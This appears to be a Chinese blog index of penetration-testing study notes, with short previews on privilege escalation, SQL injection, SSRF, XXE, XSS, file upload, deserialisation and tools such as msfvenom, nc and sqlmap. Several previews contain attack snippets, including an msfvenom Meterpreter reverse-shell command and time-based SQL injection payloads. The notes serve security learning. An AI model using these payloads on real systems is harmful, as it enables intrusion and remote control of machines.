
笔记
文章平均质量分 75
嗯光
这个作者很懒,什么都没留下…
展开
-
jboss --- 漏洞复现ysoserial工具
这里写目录标题ssh 代理转发访问物理机中的3388端口 就相当于访问虚拟机bihuo java中的 3389端口原创 2022-04-27 14:10:25 · 1389 阅读 · 0 评论 -
代理内网穿透-Lcx.exe-venom-proxychains
代理面试常问一.概述代理的本质是socks协议原创 2022-04-24 21:32:34 · 7857 阅读 · 0 评论 -
xray使用
\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xray-testphp.html使用burpsuite将接收到的流量转发到指定的监听端口7777配置burpsuite中的options选项将burpsuite监听的流量转发到127.0.0.1:7777端口命令命令> C:\Users\Administrator\Desktop\nessus\xray>xRay_v1.8.2.原创 2022-04-24 11:41:09 · 948 阅读 · 0 评论 -
这种.c文件需要编译成可执行文件 记住
原创 2022-04-24 09:32:53 · 164 阅读 · 0 评论 -
打靶narak
主机发现nmap -sS 192.168.226.0/24端口扫描dirb基于字典的目录扫描工具发现三个目录访问该目录网络存储文件共享之WebDAV再用hydra爆破以下或者burpsuite爆破yamdoot, Swarg.海德拉(Hydra)Medusa(美杜莎)patatormsf都可以用cewl工具通过爬取网站信息的关键字来生成字典,通过生成的字典进行爆破用hydra爆破工具爆破-L指定用户名 -P指定密码 ip地址加协议加路径。http就是网站的协议,原创 2022-04-22 23:51:34 · 1869 阅读 · 0 评论 -
metasploitable靶机 nessus 扫描 tomcat 漏洞复现幽灵猫
tomcat ghostcat 幽灵猫简介Tomcat是Apache软件基金会(Apache Software Foundation)项目中的一个核心项目,由Apache、Sun和其他一些公司及个人共同开发而成。Tomcat服务器是一个免费的开放源代码的Web应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP(全称Java Server Pages)程序的首选。cve-2017-12615 tomcatsystemctl st...原创 2022-04-22 11:42:58 · 872 阅读 · 0 评论 -
docker常用命令
启动systemctl start docker 启动docker-compose常用命令拉镜像(进入到vulhub某个具体目录后)docker-compose builddocker-compose up -d镜像查询(查到的第一列就是ID值)docker ps -a进入指定镜像里面(根据上一条查出的ID进入)docker exec -it ID /bin/bash1关闭镜像(每次用完后关闭)docker-compose down一.docker服务的命令启动:systemc原创 2022-04-22 10:33:24 · 1478 阅读 · 0 评论 -
msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解
抽离 专职生成对应的payload异或编码 -e x86/shikata_ga_nai -i 3linux 生成 payloadphp 生成 payloadpython 生成 payloadwindows 生产payload抽离 专职生成对应的payload异或 编码 免杀msfvenom -l platforms 支持平台msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f原创 2022-04-22 10:24:11 · 2615 阅读 · 0 评论 -
msf --攻击MySQL 和简单实用
msfdb run(可以自动链接数据库)hostsservicesuse auxiliary/scanner/mysql/mysql_versionset PASS_FILE /home/kali/Desktop/yui.txtsetexploit步骤mysql 爆破root 密码mysql_udf上传udfmysql_sql将执行的语句进行hex...原创 2022-04-21 12:43:14 · 4498 阅读 · 0 评论 -
常见工具 nc Wireshark反弹shell
常⽤⼯具• 经常使⽤且功能强⼤• 安全从业者必不可少的帮⼿• Nc / ncat• Wireshark• Tcpdumpnc -lvp使用nc 监听特定的端口nc -nv ip port 连接特定ip下的指定端口NETCAT ——NC• ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧• 侦听模式 / 传输模式• telnet / 获取banner信息• 传输⽂本信息• 传输⽂件/⺫录• 加密传输⽂件• 远程控制/⽊⻢• 加密所有流量• 流媒体服务器• 远程克隆硬盘root@原创 2022-04-20 20:10:06 · 1521 阅读 · 0 评论 -
powershell 利用提权empire使用Powersploit的使用
windows 自带的一个组件https://www.pstips.net/powershell-online-tutorials 信息网站Powershell是一种命令行shell和脚本环境.通过使用powershell,用户和脚本编写者可以对windows系统进行管理.优点:Windows7 以上操作系统默认安装.Powershell脚本可以运行在内存中,无需写入磁盘(文件不落地)可以调用.net类(C#)可以用来管理活动目录远程下载payload来执行Powershell的基本原创 2022-04-20 10:24:28 · 2280 阅读 · 0 评论 -
Windows提权 cmd 开启 3389
1.操作系统的名称和版本信号Systeminfo | findstr /B /C:”OS Name” /C:”OS Version”Systeminfo | findstr /B /C:”OS 名称” /C:”OS 版本”修补程序 补丁主机名称:hostname 命令环境变量:set 命令whoami查看所有用户查看所有用户:”net user” 或者” net1 user”命令查看管理员用户组:”net localgroup administrators”或者“net1 l原创 2022-04-18 22:05:56 · 9534 阅读 · 4 评论 -
MSSQL注入手工注入mssql提权
mssql数据库mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。MSSQL数据库的基本知识MSSQL中自带数据库信息库名相关功能master系统控制数据库,包含配置信息,用户登录信息,系统运行状态model模板数据库,数据库时建立所有数据库的模板。tempdb临时容器,保存所有的临时表,存储过程和其他程序交互的临时文件msdb主要为用户使用,记录着计划原创 2022-04-18 11:06:57 · 2356 阅读 · 1 评论 -
Linux 提权
Linux提权助手github项目cve-2022-0847面试重要最新漏洞linux polkit 权限提升大通杀一、漏洞概述1月26日,绿盟科技CERT监测到Qualys研究团队公开披露了在Polkit的pkexec 中发现的一个权限提升漏洞(CVE-2021-4034) ,也被称为PwnKit。该漏洞是由于pkexec 无法正确处理调用参数,从而将环境变量作为命令执行,具有任意用户权限的攻击者都可以在默认配置下通过修改环境变量来利用此漏洞,从而获得受影响主机的ro原创 2022-04-13 21:33:21 · 2622 阅读 · 0 评论 -
搜索引擎语法总结
搜索引擎语法总结搜索引擎是我日常工作中用得最多的一款工具,国内常用的搜索引擎包括Baidu,sougou,bing等。但我本篇要纪录的并不是这些常用的搜索引擎,而是信息安全从业人员必备的几款网络搜索引擎。本篇要介绍的搜索引擎包括:Shodan,censys,钟馗之眼,Google,FoFa,Dnsdb等。介绍的内容主要是这几款搜索引擎的一些高级语法,掌握高级语法会让搜索结果更准确。对搜索引擎语法有所遗忘的,本文可当参考,仅此而已Google搜索引擎 这里之所以要介绍google搜索引擎,是因为它有原创 2022-04-13 12:01:43 · 1588 阅读 · 0 评论 -
web安全 mysql 提权
mysql linux windows mssqlmysql 提取提权的前提条件: 已经获得一个低权限的shell 必须需要一个root权限数据库密码存放位置对应关系数据库中 mysql库===> mysql文件夹 user表===> user文件select * from mysql.user在特定场合下不会被截断截断后获取密码方法可能出现的问题:得到的密文是不完整的或者管理员设置了其他密码不能登陆进去解决方案:下载user.myd,user.frm,use原创 2022-04-13 11:51:05 · 8757 阅读 · 0 评论 -
nmap简单实用命令
content distribution networkingcdn绕过CDN就是内容分发网络,是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。如何快速判断是否存在cdn?多ping...原创 2022-04-11 23:38:01 · 5590 阅读 · 0 评论 -
漏洞挖掘与工具
一、漏洞挖掘1. 安全的木桶理论找到最薄弱的那个点;有一个漏洞的站点,很可能还会有更多的漏洞开发人员的安全意识问题;存在于一个站点的漏洞,还可能存在于其他站点业务的代码复用;通用型漏洞(wordpress插件漏洞,Discuz 更新不及时);修复了的漏洞不一定就全部修复完整了指哪修哪;绕过修复;学会找扫描器扫不到/其他白帽子难发现的漏洞需要深度交互/认证;存储XSS/CSRF/越权/逻辑漏洞;挖掘漏洞的过程通常需要先找到危险函数,然后回溯函数的调用过程,最终原创 2022-04-09 20:48:29 · 4534 阅读 · 0 评论 -
常用wed扫描工具 awvs|appscan|Netsparker|Nessus
awvs是一款知名的自动化网络漏洞扫描工具功能介绍:1.WebScanner:全站扫描,Web安全漏洞扫描2.Site Crawler:爬虫功能,遍历站点目录结构3.Target Finder:端口扫描,找出web服务器4.Subdomain Scanner:子域名扫描器,利用DNS查询5.Blind SQL Injector:盲注工具6.HTTP Editor:http协议数据包编辑器7.HTTP Sniffer:HTTP协议嗅探器8.HTTP Fuzzer:模糊测试工具9.Aut原创 2022-04-08 11:23:18 · 4402 阅读 · 1 评论 -
第二十三天 phar反序列化漏洞
关于这个方法在2018年 BlackHat 大会上的 Sam Thomas 分享了 File Operation Induced Unserialization via the “phar://” Stream Wrapper ,该研究员指出该方法在 文件系统函数 ( file_get_contents 、 unlink 等)参数可控的情况下,配合 phar://伪协议 ,可以不依赖反序列化函数 unserialize() 直接进行反序列化的操作。zip rar压缩文件包 类似默认支持phar协议的使原创 2022-04-01 11:25:58 · 2269 阅读 · 0 评论 -
第二十二天php反序列化问题
序列化百度百科上关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。简单的说,序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安全的进行通信。PHP中的序列化与反序列化PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没原创 2022-03-31 11:45:21 · 1980 阅读 · 2 评论 -
第二十天php变量覆盖
register_globals导致的变量覆盖问题register_globals的意思就是注册为全局变量,所以当On的时候,传递过来的值会被直接的注册为全局变量直接使用,而Off的时候,我们需要到特定的数组里去得到它。COOKIE,_COOKIE,COOKIE,_POST,$_GET全部会注册为全局变量.漏洞原理变量覆盖是指可以用自己的传参值代替程序原有的变量值。漏洞寻找例如下面的函数或者语法使用不当时就会出现漏洞。$$extract()parse_str()import_reque原创 2022-03-29 11:53:55 · 2025 阅读 · 0 评论 -
第二十天 PHP弱类型安全问题总结
php比较表 https://www.php.net/manual/zh/types.comparisons.phpPHP弱类型简介在PHP中,可以进行一下的操作。$a= 1;$a = array();$a = "stringg";弱类型的语言对变量的数据类型没有限制,你可以在任何地时候将变量赋值给任意的其他类型的变量,同时变量也可以转换成任意地其他类型的数据。类型转换问题类型转换是无法避免的问题。例如需要将GET或者是POST的参数转换为int类型,或者是两个变量不匹配的时候,PHP原创 2022-03-28 23:18:57 · 1500 阅读 · 0 评论 -
klai网络配置
临时ip地址自动 获取 dhclient etho手动配置 IP地址 ifconfig eth0 192.168.226.140/24配置dnsDNC 存储在 /etc/resolv.confecho nameserver 192.168.1.1 > /etc/resolv.conf也可以 vim /etc/resolv.conf固定ip 地址配置固定IP地址• cat /etc/network/interface• auto eth0• i原创 2022-03-26 23:27:02 · 2365 阅读 · 0 评论 -
kali Liunx常用命令环 档案与目录 6个小时耐心总结
在我们Linux系统当中,预设的情况下,所有的系统上的帐号与一般身份使用者,还有那个root的相关资讯, 都是记录在/etc/passwd这个档案内的。至于个人的密码则是记录在/etc/shadow这个档案下。此外,Linux所有的群组名称都纪录在/etc/group内!这三个档案可以说是Linux系统里面帐号、密码、群组资讯的集中地啰!不要随便删除这三个档案啊!_ls 命令说明ls 是英文单词 list 的简写,其功能为列出目录的内容,是用户最常用的命令之一,类似于 DOS下的 dir 命令ls原创 2022-03-26 22:26:38 · 2490 阅读 · 1 评论 -
使用Burpsuite进行半自动注入 布尔盲注和时间盲注 个人总结
利用前提 ,页面上没有显示位 , 也没有输出 $ QL 语句执行错误信息 。正确的 SQL 语句和错误的 SQL 语句返回页面都 0 样 , . 但是加入 s 丨 p ( 5 ) 条件之后 , 页面的返回速度明显慢了 5 秒 。优点 .不需要显示位 , 不需要出错信息 。速度慢 , . 耗费大量时间 。payload: and if(length(database())=8,sleep(10),1) --+判断当前数据库库名的长度如果数据库库名长度大于等于8,则mysql查询休眠10原创 2022-03-26 13:47:02 · 4321 阅读 · 2 评论 -
第十八天xxe 外部实体
简单来说,XXE(XML External Entity Injection)就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。一、xml基础XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言原创 2022-03-25 15:40:00 · 449 阅读 · 0 评论 -
kali docker安装部署 漏洞复现
什么是 Docker?“Docker” 一词指代多种事物,包括开源社区项目、开源项目使用的工具、主导支持此类项目的公司 Docker Inc. 以及该公司官方支持的工具。技术产品和公司使用同一名称,的确让人有点困惑。我们来简单说明一下:??? IT 软件中所说的 “Docker” ,是指容器化技术,用于支持创建和使用 Linux 容器。??? 开源 Docker 社区致力于改进这类技术,并免费提供给所有用户,使之获益。??? Docker Inc. 公司凭借 Docker 社区产品起家,它主要负责原创 2022-03-23 22:34:53 · 1582 阅读 · 0 评论 -
第十七ssrf攻击技术 很全面 服务器端请求伪造
SSRF攻击技术SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)1.1.1 SSRF形成原因SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档,等等。首先原创 2022-03-23 22:05:03 · 1705 阅读 · 0 评论 -
第十六天csrf 跨站请求伪造
xss跨站脚本攻击分为三大类:反射型xss特点:1.通常在我们的请求包中或者在url中存在插入的payload2. 需要服务器的参与 并最终通过服务器返回插入的payload存储型xss特点:1.需要数据库的参与2. 被攻击者访问特定的页面 服务器会从数据库中读取插入的payload 并最终返回dom型xss特点:1.无需服务器的参与2. 右键查看源代码 无法查看到插入的payloadcsrf 跨站请求伪造挟制目标用户执行某些非本意的操作跨站请求伪造(英语:Cross.原创 2022-03-22 23:28:31 · 410 阅读 · 0 评论 -
第十五天DOM型xss和编码绕过问题
DOM型xss对象模型(Document Object Model),即大名鼎鼎的DOM。DOM可以被认为是一种通过将页面元素以对象的树形方式表现,以便由Javascript组织处理的实现方法。特点2 无需服务器参与为什么右键查看源代码 无法找到插入的payload源代码 来源于服务器的返回 而dom型xss无需服务器的参与 所以此时无法修改右键查看的源代码DOM XSS与反射型XSS和存储型XSS的差别是在于DOMXSS的代码不需要服务器解析响应的直接参与,触发XSS漏洞靠原创 2022-03-21 21:19:27 · 2033 阅读 · 0 评论 -
文件上传 代码命令执行 xss
复习1.文件上传a) 前端js校验 先上传一个白名单内的文件 通过burpsuite改包 b) MIME类型校验 包中的content-type类型c) 黑名单绕过 1. 大小写绕过 2. 其他后缀 .php3 .php4 .phtml 3.windows 特性 空格 点 4.::$DATA 数据流 5..htaccess 控制当前目录下的解析 6.%00截断 5.3.4 < 7.解析漏洞: a) apache 解析漏洞 从右往左解析 b) iis 解析漏洞原创 2022-03-21 13:46:54 · 896 阅读 · 0 评论 -
绕过preg_match
绕过preg_match<?php$input = $_GET['input'];if (preg_match("/[a-zA-Z]/", $input)) { exit("wrong");}eval($input);可以简单的理解preg_match("/[a-zA-Z]/" 正则表达式匹配 大小写字母符号最终的目的是要到eval()函数中去执行任意代码,这题也就是考研我们如何绕过这个preg_match。简单来说将特殊字符通过异或的方式重组了phpinfo();什么是按原创 2022-03-21 12:07:43 · 3084 阅读 · 0 评论 -
第十四天命令执行绕过练习题
第一题//1. 读取同目录下的bihuo.txt 文件的内容 linux环境下自己创建bihuo.txt<?phperror_reporting(0);#屏蔽错误if(isset($_GET['c'])) { $c = $_GET['c']; if(!preg_match('/bihuo/i', $c)) { #过滤bihuo关键字 eval($c);#代码执行 }} else { highlight_file(__FILE__);}?&g原创 2022-03-21 12:03:23 · 405 阅读 · 0 评论 -
第十天文件包含漏洞 php伪协议
文件包含漏洞PHP中常见包含文件函数常见文件包含漏洞代码文件包含漏洞的危害文件包含的漏洞的分类本地文件包含**1.上传图片马**2.读取网站源码以及配置文件远程文件包含什么是文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件。而无需再次编写,这种 文件调用的过程一般被称为文件包含。例如:include “conn.php”PHP中常见包含文件函数 include()当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进原创 2022-03-15 12:03:22 · 4438 阅读 · 0 评论 -
第七天文件上传漏洞
tampr脚本和文件上传-tampr脚本1.1 -tampr脚本简介1.2 如何用 --tamper脚本1.3查看SQLMAP调用tamper脚本文件space2comment.py的过程2 文件上传漏洞2.1 什么是文件上传漏洞2.2什么是webshell2.3产生文件上传漏洞的原因3 文件上传漏洞的攻击方式3.1 uplod -- pass-01 前端限制3.2 uplod -- pass-02 ['upload_file']['type'] 绕过3.3 uplod -- pass-03原创 2022-03-10 11:58:17 · 676 阅读 · 0 评论 -
sqlmap常见命令
sqlmap常用命令:学习sqlmap的利用:sqlmap 自动化sql注入工具-u 注入的url-r http请求包的地址–data 以post形式提交的数据–cookie cookie传递的值–user-agent user-agent头–referer referer值–delay 相邻包之间的间隔时间 -p 指定优先注入的参数–skip 跳过注入的参数-v 3 payload 4 http请求包–level 分5级2: cookie3: referer|user-age原创 2022-03-09 22:16:07 · 968 阅读 · 0 评论 -
第六天二次注入sqlmap简单参数
二次注入今天学习二次注入二次注入原理二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。也就是说在应用程序中输入恶意造的数据库查询语句时会被转义,但是在数据库内部调用读取语句的时候又被还原。二次注入,可以概括为以下两步:第一原创 2022-03-09 12:08:05 · 3014 阅读 · 1 评论 -
第五天快http头部信息注入cooik
复显今天的内容宽子节client_ip以及X_FORWARDED_FOR的利用Sql相关的转义字符函数在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。定义和用法addslashes()函数返回在预定义字符之前添加反斜杠的字符串。预定义字符是:单引号()双引号(")反斜杠(八)原创 2022-03-08 22:16:16 · 497 阅读 · 0 评论 -
sqli-labs ----less-26---37--练习
sqli-labs————Less-26(绕空格、/*、#等)该关卡提示空格和注释被转义,我们测试一下:http://www.sqli.com/Less-26/?id=1’报错sqli-labs-master/Less-26/?id=1’ --+ 依旧报错,我添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下:http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00and应该被转义了 phpstorm原创 2022-03-07 11:34:02 · 1060 阅读 · 0 评论